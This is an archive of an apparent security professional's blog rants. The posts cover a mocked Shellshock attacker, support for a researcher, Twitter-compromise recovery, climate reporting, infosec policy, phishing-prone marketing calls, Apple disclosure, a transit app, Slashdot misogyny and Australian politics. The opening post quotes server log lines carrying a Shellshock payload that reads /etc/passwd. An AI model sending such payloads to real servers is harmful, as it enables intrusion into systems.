Category Archives: Rants

Some people don’t get the hint

85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1″ 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd”
85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1″ 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd”

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.

Stop. Just stop.

In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real” “It’s impossible” “It’s fake” is becoming overwhelming without sufficient evidence one way or another. Why are so many folks in our community ready to jump on the negative bandwagon, even if they can’t prove it or simply don’t have enough evidence to say one way or another?

My issue is not “is it true” or “I think it’s true” or “I think it’s false”, it’s that so many info sec “professionals” are basically claiming:

  1. Because I personally can’t verify this issue is true, the issue must be false. QED.

This fails both Logic 101, class 1, and also the scientific method. 

This is not a technical issue, it’s a people issue.

We must support all of our researchers, particularly the wrong ones. This is entirely obvious. If we eat our young and most venerable in front of the world’s media, we will be a laughing stock. Certain “researchers” are used by their journalist “friends” to say very publicly “I think X is a fool for thinking that his computers are suspect”. This is utterly wrong, foolhardy, and works for the click bait articles the J’s write and on their news cycle, not for us.

Not everybody is a viable candidate for having the sample. In my view, the only folks who should have a sample of this thing are those who have sufficient operational security and budget to brick and then utterly destroy at least two or twenty computers in a safe environment. That doesn’t describe many labs. And even then, you should have a good reason for having it. I consider the sample described to needing the electronic equivalent of Level PC4 bio labs. Most labs are not PC4, and I bet most of infosec computing labs are not anywhere near capable of hosting this sample.

Not one of us has all of the skills required to look at this thing. The only way this can be made to work is by working together, pulling together E.Eng folks with the sort of expensive equipment only a well funded organisation or a university lab might muster, microcontroller freaks, firmware folks, CPU microcode folks, USB folks, file system folks, assembly language folks, audio folks, forensic folks, malware folks, folks who are good at certain types of Windows font malware, and so on. There is not a single human being alive who can do it all. It’s no surprise to me that Dragos has struggled to get a reproducible but sterile sample out. I bet most of us would have failed, too.

We must respect and use the scientific method. The scientific method is well tested and true. We must rule out confirmation bias, we must rule out just “well, a $0.10 audio chip will do that as most of them are paired with $0.05 speakers and most of the time it doesn’t matter”. I actually don’t care if this thing is real or not. If it’s real, there will be patches. If it’s not real, it doesn’t matter. I do care about the scientific method, and it’s lack of application in our research community. We aren’t researchers for the most part, and I find it frustrating that most of us don’t seem to understand the very basic steps of careful lab work and repeating important experiments.

We must allow sufficient time to allow the researchers to collaborate and either have a positive or negative result, analyse their findings and report back to us. Again, I come back to our journalist “friends”, who can’t live without conflict. The 24 hour news cycle is their problem, not our problem. We have Twitter or Google Plus or conferences. Have some respect and wait a little before running to the nearest J “friends” and bleating “It’s an obvious fake”.

We owe a debt to folks like Dragos who have odd results, and who are brave enough to report them publicly. Odd results are what pushes us forward as an industry. Cryptoanalysis wouldn’t exist without them. If we make it hard or impossible for respected folks like Dragos to report odd results, imagine what will happen the next time? What happens if it’s someone without much of a reputation? We need a framework to collaborate, not to tear each other down.

Our industry’s story is not the story about the little boy who cried wolf. We are (or should be) more mature than a child’s nursery rhyme. Have some respect for our profession, and work with researchers, not sully their name (and yours and mine) by announcing before you have proof that something’s not quite right. If anything, we must celebrate negative results every bit as much as positive results, because I don’t know about you, but I work a lot harder when I know an app is hardened. I try every trick in the book, including the stuff that is bleeding edge as a virtual masterclass in our field. I bet Dragos has given this the sort of inspection that only the most ardent forensic researcher might have done. If he hasn’t gotten that far, it’s either sufficiently advanced to be indistinguishable from magic, or he needs help to let us understand what is actually there. I bet that few of us could have gotten as far as Dragos has.

To me, we must step back, work together as an industry – ask Dragos: “What do you need?” “How can we help?” and if that’s “Give me time”, then let’s step back and give him time. If it’s a USB circuit analyser or a microcontroller dev system and plus some mad soldering skills, well, help him, not tear him down. Dragos has shown he has sufficient operational security to research another 12-24 months on this one. We don’t need to know now, now, or now. We gain nothing by trashing his name.

Just stop. Stop trashing our industry, and let’s work together.

So your Twitter has been hacked. Now what?

So I’m getting a lot of Twitter spam with links to install bad crap on my computer.

More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions.

So what do you need to do?

Simple. Follow these basic NIST approved rules:

Contain – find out how many of your computers are infected. If you don’t know how to do this, assume they’re all suspect, and ask your family’s tech support. I know you all know the geek in the family, as it’s often me.

Eradicate – Clean up the mess. Sometimes, you can just use anti-virus to clean it up, other times, you need to take drastic action, such as a complete re-install. As I run a Mac household with a single Windows box (the wife’s), I’m moderately safe as I have very good operational security skills. If you’re running Windows, it’s time for Windows 8, or if you don’t like Windows 8, Windows 7 with IE 10.

Recover – If you need to re-install, you had backups, right? Restore them. Get everything back the way you like it.

  • Use the latest operating system. Windows XP has six months left on the clock. Upgrade to Windows 7 or 8. MacOS X 10.8 is a good upgrade if you’re still stuck on an older version. There is no reason not to upgrade. On Linux or your favorite alternative OS, there is zero reason not to use the latest LTS or latest released version. I make sure I live within my home directory, and have a list of packages I like to install on every new Linux install, so I’m productive in Linux about 20-30 minutes after installation.
  • Patch all your systems with all of the latest patches. If you’re not good with this, enable automatic updates so it just happens for you automatically. You may need to reboot occasionally, so do so if your computer is asking you to do that. On Windows 8, it only takes 20 or so seconds. On MacOS X, it even remembers which apps and documents were open.
  • Use a safer browser. Use IE 10. Use the latest Firefox. Use the latest Chrome. Don’t use older browsers or you will get owned.
  • On a trusted device, preferably one that has been completely re-installed, it’s time to change ALL of your passwords as they are ALL compromised unless proven otherwise. I use a password manager. I like KeePass X, 1Password, and a few others. None of my accounts shares a password with any other account, and they’re all ridiculously strong. 
  • Protect your password manager. Make sure you have practiced backing up and restoring your password file. I’ve got it sprinkled around in a few trusted places so that I can recover my life if something bad was to happen to any single or even a few devices.
  • Backups. I know, right? It’s always fun until all your data and life is gone. Backup, backup, backup! There are great tools out there – Time Capsule for Mac, Rebit for Windows, rsync for Unix types.

Learn and improve. It’s important to make sure that your Twitter feed remains your Twitter feed and in fact, all of your other accounts, too.

I never use real data for questions and answers, such as my mother’s maiden name as that’s a public record, or my birth date, which like everyone else, I celebrate once per year and thus you could work it out if you met me even randomly at the right time of the year. These are shared knowledge questions, and thus an attacker can use that to bypass Twitter, Google’s and Facebook’s security settings. I either make it up or just insert a random value. For something low security like a newspaper login or similar, I don’t track these random values as I have my password manager to keep track of the actual password. For high value sites, I will record the random value to “What’s your favorite sports team”. It’s always fun reading out 25 characters of gibberish to a call centre in a developing country.

Last word

I might make a detailed assessment of the DM spam I’m getting, but honestly, it’s so amateur hour I can’t really be bothered. There is no “advanced” persistent threat here – these guys are really “why try harder?” when folks don’t undertake even the most basic of self protection.

Lastly – “don’t click shit“. If you don’t know the person or the URL seems hinky, don’t click it.

That goes double for infosec pros. You know better, or you will just after you click the link in Incognito / private mode. Instead, why not fire up that vulnerable but isolated XP throw away VM with a MITM proxy and do it properly if you really insist on getting pwned. If you don’t have time for that, don’t click shit.

El Reg and the troubling case of climate denialism

This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites.

Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate science. Considering he (and for what it’s worth, myself) is not a climatologist, it’s very frustrating to see the “science” category tag on these articles. It wouldn’t be so bad if it was marked Opinion or Editorial, and that he wasn’t deliberately misrepresenting the observed facts, papers, research and scientists’ own words, but that he gives no truck at all to anything that doesn’t fit into his worldview.

Just to be utterly clear – among scientists who are trained in climatology, there is no doubt that we are in a rapidly changing world. Basically the question hasn’t been “if” there’s climate change for about 15-20 years, but “what does it mean to be on this planet in 10-20-50-100 years”. It’s up to us and the politicians to decide “what to do about it”. Even if climate change is not as bad as predicted (which actually, it’s worse than has been predicted), the actions we must take now are good for us and the planet:

  • less air pollution == longer, heathier lives
  • less water pollution == longer, healthier lives
  • lower energy bills == more money for other things
  • less wasteful consumption of a finite non-renewable resource == richer, more economically healthy future and longer production of things we can’t economically make without oil, like certain materials and medicines and so on

There is literally no downside to acting to curb emissions, but there’s a lot on the line if we don’t do something. Personally, I don’t think an ETS is the correct path as it’s a cheap way for the government to earn money and seen to be doing something – anything at all, but as it’s a derivative market, which has a colorful history of abuse (such as in Germany, where too many credits were issued undermining the market, and California, where traders essentially create artificial spikes in price to maximise profits and create artificial blackouts), but despite this, we must move on to the phase of our industrial planet.

I call on the Register to provide the scientific consensus view. Here’s my rejected comment in full.

It’s my long and fervent wish that the Register would stop publishing these opinion pieces, as I rather enjoy the “call a spade a f$&#ing spade” approach to almost all the other articles, reviews and IT news, which is rather let down by Mr Page’s long standing and regular missives on this topic.

In my opinion, these articles are not “science”, nor are they reasonable journalism, where the authors of the paper might be asked for a comment or an interview to get their side first hand. Mr Page can still have his opinion, but at least pay us the respect of writing about the researchers, paper or presentation in an unbiased way to allow us to compare Mr Page’s opinion with what they really wrote, demonstrated, observed or said.

At least pay us the respect of providing balanced coverage either by providing mainstream climate science coverage in the science category along with Mr Page’s opinion pieces and coverage, or by adding in right of reply, interviews and accurate coverage of what was actually written in the papers and research.

Infosec apostasy

I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security:

  • Those who aim via various usual suspects to protect things
  • Those who aim via various often controversial and novel means to protect people 

Think about this for one second. If your compliance program is entirely around protecting critical data assets, you’re protecting things. If your infosec program is about reducing fraud, building resilience, or reducing harmful events, you’re protecting people, often from themselves.

I didn’t think my rather longish post, which brought together the ideas of the information swarm (it’s there, deal with it), information security asymmetry and pets/cattle (I rather like this one), would land with the heavy thud akin to 95 bullet points nailed to the church door.

So I started thinking – why do people still promulgate stupid policies that have no bearing on evidence? Why do people still believe that policies, standards, and spending squillions on edge and end point protection when it is trivial to break it?

Faith.

Faith in our dads and grand dads that their received wisdom is appropriate for today’s conditions.

Si Dieu n’existait pas, il faudrait l’inventer” Voltaire

(Often mis-translated as “if religion did not exist, it would be necessary to create it”, but close enough for my purposes)

I think we’re seeing the beginning of infosec religion, where it is not acceptable to speak up against unthinking enforcement of hand me down policies like 30 day password resets or absurd password complexity, where it is impossible to ask for reasonable alternatives when you attempt to rule out the imbecilic alternatives like basic authentication headers.

We cannot expect everyone using IT to do it right, or have high levels of operational security. Folks often have a quizzical laugh at my rather large random password collection and use of virtual machines to isolate Java and an icky SOE. But you know what? When Linked In got pwned, I had zero fears that my use of Linked In would compromise anything else. I had used a longish random password unique to Linked In. So I could take my time to reset that password, safe in the knowledge that even with the best GPU crackers in existence, the heat death of the universe would come before my password hash was cracked. Plenty of time. Fantastic … for me, and I finally get a pay off for being so paranoid.

But… I don’t check my main OS every day for malware I didn’t create. I don’t check the insides of my various devices for evil maid MITM or keyloggers. Let’s be honest – no one but the ultra paranoid do this, and they don’t get anything done. But infosec purists expect everyone to have a bleached white pristine machine to do things – or else the user is at fault for not maintaining their systems.

We have to stop protecting things and start protecting humans, by creating human friendly, resilient processes with appropriate checks and balances that do not break as soon as a key logger or network sniffer or more to the point, some skill is brought to bear. Security must be agreeable to humans, transparent (as in plain sight as well as easy to follow), equitable, and the user has to be in charge of their identity and linked personas, and ultimately their preferred level of privacy.

I am nailing my colors to the mast – we need to make information technology work for humans. It is our creature, to do with as we want. This human says “no

Marketing – first against the wall when the revolution comes

A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call.

*Click*

As a consumer, you must hang up to avoid being scammed. End of story. No exceptions.

Even if the business has a relationship with the consumer, asking them to prove who they are is wildly inappropriate. Under no circumstances should a customer be required to provide personal information to an unknown caller. It must be the other way around – the firm must provide positive proof of who they are! And by calling the client, the firm already knows who the client is, so there’s no reason for the client to prove who they are.

As a business, you are directly hurting your bottom line and snatching defeat from the jaws of victory by asking your customers to prove their identity to you.

This is about the dumbest marketing mistake ever – many customers will automatically assume (correctly in my view) that the campaign is a scam, and repeatedly hang up, thus lowering goal completion rates and driving up the cost of sales. Thus this dumb move can cost a company millions in opportunity costs in the form of:

  • wasted marketing (hundreds of dropped customer contacts for every “successful” completed sale),
  • increase fraud to the consumer and ultimately the business when customers reject fraudulent transactions
  • lose thousands if not hundreds of thousands of customers, and their ongoing and future revenue if they lose trust in the firm or by the firm’s lack of fraud prevention, cause them to suffer fraud by allowing scammers to easily harvest PII from the customer base and misuse it

Customers hate moving businesses once they have settled on a supplier of choice, but if you keep on hassling them the wrong way, they do up and leave.

So if any of you are in marketing or are facing pressure from the business to start your call script by asking for personally identifying information from your customers, you are training your customers to become victims of phishing attacks, which will cost you millions of dollars and many more lost customers than you’ll ever gain from doing the right thing.

It’s more than just time to change this very, very, very bad habit.

Responsible disclosure failed – Apple ID password reset flaw

Responsible disclosure is a double edged sword. The faustian bargain is I keep my mouth shut to give you time to fix the flaws, not ignore me. I would humbly suggest that it is very relevant to your interests when a top security researcher submits a business logic flaw to you that is trivially exploitable with just iTunes or a browser requiring no actual hacking skills.

If anyone knows anyone at Apple, please re-share or forward this post, and ask them to review my rather detailed description of my rather simple method of exploiting the Apple ID password reset system I submitted over six months ago with so far zero response beyond an automated reply. The report tracking number is #221529179 submitted August 12, 2012.

My issue should be fixed along with the other issues before they let password reset back online with my flaw intact.

PTV iPhone app – worst public transport app ever, or just pure evil?

I take the train between Marshall and Southern Cross Station, a terminus station with 14 or 15 platforms and hundreds of V/Line country, suburban and bus services daily. I had an app that worked (the old MetLink app). That wasn’t stellar, but it worked well enough that I didn’t need to get a paper timetable.

So imagine my continuing frustration that the most basic of use cases just doesn’t work in the complete re-write of the new app:

I cannot find my station when standing on the station platform (!) using location search or by searching for the station in the default “Trains” mode the app comes in from the AppStore.

It cannot find the terminus of all V/Line services – Southern Cross Station. I’m serious. In “Train” mode, you cannot search for V/Line services or stations. In “V/Line” mode, Southern Cross is not even a station (!!). You cannot find it by clicking on “Find my location” icon whilst in the station (!), and you cannot choose it from the map, and you cannot search for it. Epic fail of all epic fails. It’s like the PTV app designers chose not to walk the 40 m from their office block to the biggest and busiest station in all of Victoria and test it out.

Modality. It’s nearly impossible to work out you can change the mode of transport you’re looking up by clicking the word “Trains” at the bottom of the screen. I am catching a “train”, but not the default type of “train”. Who knew? The thought that there are multiple types of trains obviously never entered to PTV’s UX designers. There’s no button shape or indicator, it’s just in a button bar by itself, which usually means that there are no other choices.

Honestly, PTV need to test their apps:

  • You should be able to find all the services within 500 m of where you are standing. Just list them all and let the filter function narrow things down in one or two keytaps.
  • You should be able to find ANY station or service or transport mode via text search. It’s just not that hard. There should be no difference between a regional bus, a metropolitan tram, an intercity V/Line service, or a station or bus stop. List ‘em all, and let the filter work its magic in a few keystrokes.
  • Get rid of modes. I don’t think of modes and I use at least two every day. Free up that wasted screen real estate and replace it with a search function that works across all modes, and services.
  • You should be able to view a line’s entire timetable with no more than two or three clicks. Timetables -> scroll to the timetable or tap in enough to narrow things down -> voila. It’s not rocket science. Allow it to be a favorite.
  • Planning a multi-mode trip is not rocket science. This is just not possible with the current PTV app.
  • The old app had notifications for the services / lines you were interested in. Please bring it back. This feature may actually be in the PTV app – I simply don’t know because I have not been able to find my station or the station at which I get off.

This app is terrible. It must be withdrawn.

Shame, Slashdot, Shame – misogyny and moderation

Our industry suffers from a lack of women – women in senior positions are very rare, women who do what I do I can count on my hands without resorting to binary, and there are so few women coming out of Uni comp sci, developers and engineering courses that I can use and craft into my replacements.

IT needs women, and lots more of them, not only for the perspective they can bring to the table, but simply in the terrible truth that young women deciding on future careers at high school don’t see any future for themselves in our great industry, or any of the Science, Technology, Engineering or Medical research (STEM) subjects as a valid career choice.

There is so much to do to rectify this situation, not the least eliminating low hanging fruit, such as eliminating booth babes. I’ve heard lots of excuses, like:

  • “It’s a legal job, I don’t see the problem” (this one makes the least amount of sense)
  • “Everyone does it” (no, they most certainly don’t)

So when /. posts a story on what booth babes really think of us leering at them, you know it’s going to be a stinky disgusting mess, but you have to try to convert the heathens in any case.

I’ve been a Slashdot irregular for years. In 1999, the /. “community” said some disgusting things about Richard Stevens, the author of some of the (still) best Unix and TCP/IP books. I stopped going there every day after that shameful episode. I’ve not posted there since 2010, but I have /. in my RSS feed.

I have removed that feed today and I will be deleting my account shortly.

Why?

Many of you know my very low opinion of IT vendors who use booth babes at trade shows.

Update: I found this comment to a similar post last year just a few minutes ago:

Thanks for making the main point clear, I want to chime in here as a woman and someone who has represented my company from very early on at trade shows (and does to this day). In the telecom industry in particular these booth babes run rampant, they literally provide you with a form when you register to exhibit asking if you want to hire models.

At one event a couple years ago, a guy came over to talk with our CTO (a guy) and I and said point blank to me, “do you have an ownership stake in the company? if not, at least you’ve got one foot in the door to marry this guy?” Nevermind that I’m wearing my wedding ring! All I could do was paint a “go F&%$ yourself” smile on my face and wait for him to leave. The things I would have liked to say, but it just wasn’t worth it in that context.

The problem is, most people don’t walk up to me expecting me to know about APIs, building applications, solving problems specific to their industry or use case, how supply chain works, or anything else important to their business. This is perpetuated by booth babes. How do I know? If I dress in a frumpy or slightly less feminine style, instead of my normal stylish heels and a skirt suit, I get a different reaction. If I wear skinny jeans and flats and a tshirt or hoodie, look my age (early 20s) and have a self-effacing air, they think “oh she’s a nerdy girl” and then they ask the real questions. PUH-LEASE.

If you are a vendor, I have a very strict, and very long standing rule – if you use booth babes, I either don’t recommend you to my clients, or I actively campaign against you, and I will never, ever buy from you again. Such vendors have lost more than a $1m in recommendations from me alone in the last 10 years, and I doubt I am alone in my opinion of such appalling, women hating sales tactics.

So fast forward to today. I logged in after a few days to see if my romantic idealization of early Slashdot met up with even 1999 Slashdot low life scum. I was saddened and disappointed. I lost my decade long “excellent”  karma rating to peer moderation, and it’s no surprise the peers at Slashdot hate women.

One of my posts had to get more than seven negative flamebait downward moderation clicks to get the score it finally received.

So let’s look at the quality gem of a reply that gets +5 moderation (errors in copy and paste I will leave to the troll, can’t even do that right):

“ook at my low user ID, I’ve been here for longer than some of you have been alive.”

No one cares. I’m probably the same age as you but I don’t go around pointing it out as if it somehow adds extra weight to the argument.

“I am literally white hot angry with whomever did it b”

You’ll get over it.

“f you have a daughter, I expect you’ll want her to be a geekgrrl. If you want that outcome, you will join me in boycotting booth babes.”

Actually if I had a daughter I’d let her do whatever she wanted. Unfortunately you obviously don’t realise it but you’re just another one of those self righteous prudish males who seem to think that women should only do the jobs YOU approve of. Newsflash pal – its the WOMEN who get to decide whether to do it , not people like you.

I suspect in another century you’d be at the pulpit foaming at the mouth and damning any woman who dared go out with an unmarried man or wear a short skirt or speak before a man gave her permission.

You know what – Fuck you and your kind.

From viol8, a 40-something troll programmer who lives and works somewhere in Europe (if he can be trusted to thump things into the post box), who comes across as an arrogant Australian or English ex pat. I can’t be arsed working out who he is any longer – he’s exactly like any number of the worthless women hating smegheads that infest slashdot.

It’s time to put /. out of its misery and terminal decline. It has been an irrelevant community for years, and now the cesspool is dead to me.

ajv (4061, ex-member /. 1997-2012)

Update: RSS feed – deleted. Twitter – unfollowed. Can I find how to delete my /. account, no I can’t. Help appreciated in the box below.

Political expediency

Last week, Julia Gillard listened to Clubs Australia and the few voters out at Rooty Hill RSL rather than do the right thing and fix problem gambling. In her announcement, she used the code word “gaming”, which is industry speak that doesn’t like to be called “gambling”. By using this special phrase, it’s obvious that for-profit gambling is more important to her than the lives of problem gamblers and society’s fabric, particularly those who are close to problem gamblers.

The problem isn’t the little flutters that most of us have from time to time, it’s the problem gamblers who form much of the industry’s profits. The for-profit firms have shown no mercy in their campaign to get rid of gambling reform. They succeeded.

The problem is the ALP now sways in the wind to the tune of vested interests rather than the public good. Whitlam didn’t give up on creating Medicare just because the AMA was against it. Hawke and Keating didn’t give up on monetary reform, such as floating the dollar or removing trade barriers that have made us far richer, just because the unions were against it.

The ALP will be in the wilderness for a very long time after the next election. They can’t rule by themselves for many years because they have given up on traditional ALP values, and abandoned and cast off a good percentage of their party support base to the Greens.

If the ALP wants to govern again, it needs to get some vision aligned with its core values, and do it. Kicking refugees, dropping gambling reform, and working against gay marriage are none of these things. Once Craig Thompson has gone (and although I reckon he will hang on until convicted, he surely will be forced to go), the ALP will feel the full wrath of its core voters.